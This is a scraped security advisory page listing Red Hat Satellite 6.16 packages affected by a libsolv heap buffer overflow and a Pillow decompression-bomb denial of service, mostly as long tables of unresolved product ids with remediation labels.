| Unresolved product id: 9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src | — | ||
| Unresolved product id: 9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src | — | ||
| Unresolved product id: 9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src | — | ||
| Unresolved product id: 9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src | — |
A flaw was found in libsolv. This heap buffer overflow occurs during the decompression of attacker-controlled compressed data within `.solv` files due to insufficient input validation. An attacker can provide a specially crafted `.solv` file, which, when processed by a vulnerable application, can lead to out-of-bounds memory access. This could result in information disclosure, alteration of program execution, or a denial of service.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src | — |
Workaround
|
A flaw was found in Pillow, a Python imaging library. A remote attacker could exploit this vulnerability by providing specially crafted PCF font data. This data, when processed, can lead to excessive memory allocation because the library does not properly check for decompression bombs. The primary consequence is a Denial of Service (DoS), which could make the affected system or application unavailable.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
